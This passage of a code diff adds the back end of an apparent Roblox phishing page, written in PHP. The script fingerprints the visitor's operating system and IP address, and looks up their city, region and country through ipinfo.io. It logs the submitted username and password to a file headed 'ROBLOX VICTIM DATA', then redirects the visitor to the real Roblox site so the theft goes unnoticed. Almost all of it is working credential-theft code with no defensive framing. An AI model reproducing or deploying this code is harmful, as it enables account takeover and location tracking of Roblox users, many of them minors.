+        $operating_system = 'IPhone';
+    } elseif (preg_match('/ipod/i', $u_agent)) {
+        $operating_system = 'IPod';
+    } elseif (preg_match('/ipad/i', $u_agent)) {
+        $operating_system = 'IPad';
+    } elseif (preg_match('/android/i', $u_agent)) {
+        $operating_system = 'Android';
+    } elseif (preg_match('/blackberry/i', $u_agent)) {
+        $operating_system = 'Blackberry';
+    } elseif (preg_match('/webos/i', $u_agent)) {
+        $operating_system = 'Mobile';
+    }
+    
+    return $operating_system;
+}
+
+
+$os_system = get_operating_system();
+
+
+
+// Get Victim Geolocation Info
+function get_client_ip()
+{
+    $ipaddress = '';
+    if (isset($_SERVER['HTTP_CLIENT_IP'])) {
+        $ipaddress = $_SERVER['HTTP_CLIENT_IP'];
+    } else if (isset($_SERVER['HTTP_X_FORWARDED_FOR'])) {
+        $ipaddress = $_SERVER['HTTP_X_FORWARDED_FOR'];
+    } else if (isset($_SERVER['HTTP_X_FORWARDED'])) {
+        $ipaddress = $_SERVER['HTTP_X_FORWARDED'];
+    } else if (isset($_SERVER['HTTP_FORWARDED_FOR'])) {
+        $ipaddress = $_SERVER['HTTP_FORWARDED_FOR'];
+    } else if (isset($_SERVER['HTTP_FORWARDED'])) {
+        $ipaddress = $_SERVER['HTTP_FORWARDED'];
+    } else if (isset($_SERVER['REMOTE_ADDR'])) {
+        $ipaddress = $_SERVER['REMOTE_ADDR'];
+    } else {
+        $ipaddress = 'UNKNOWN';
+    }
+
+    return $ipaddress;
+}
+$PublicIP = get_client_ip();
+$json     = file_get_contents("http://ipinfo.io/$PublicIP/geo");
+$json     = json_decode($json, true);
+$country  = $json['country'];
+$region   = $json['region'];
+$city     = $json['city'];
+
+
+
+
+file_put_contents($file, print_r("\nROBLOX VICTIM DATA => Informations \n", true), FILE_APPEND);
+file_put_contents($file, print_r("/////////////////////////////////////////////////////// \n", true), FILE_APPEND);
+file_put_contents($file, print_r("IP: $ip \n", true), FILE_APPEND);
+file_put_contents($file, print_r("Full-Date: $full_date \n", true), FILE_APPEND);
+file_put_contents($file, print_r("Country: $country \n", true), FILE_APPEND);
+file_put_contents($file, print_r("Region: $region \n", true), FILE_APPEND);
+file_put_contents($file, print_r("City: $city \n", true), FILE_APPEND);
+file_put_contents($file, print_r("User-Agent: $browser \n", true), FILE_APPEND);
+file_put_contents($file, print_r("OS-System: $os_system \n", true), FILE_APPEND);
+file_put_contents($file, "Username: " . $_POST['user'] . "\n", FILE_APPEND);
+file_put_contents($file, "Password: " . $_POST['pass'] . "\n", FILE_APPEND);
+file_put_contents($file, print_r("/////////////////////////////////////////////////////// \n", true), FILE_APPEND);
+file_put_contents($file, print_r("\n", true), FILE_APPEND);
+
+?>
+
+ <meta http-equiv="refresh" content="0; url=https://www.roblox.com/"/>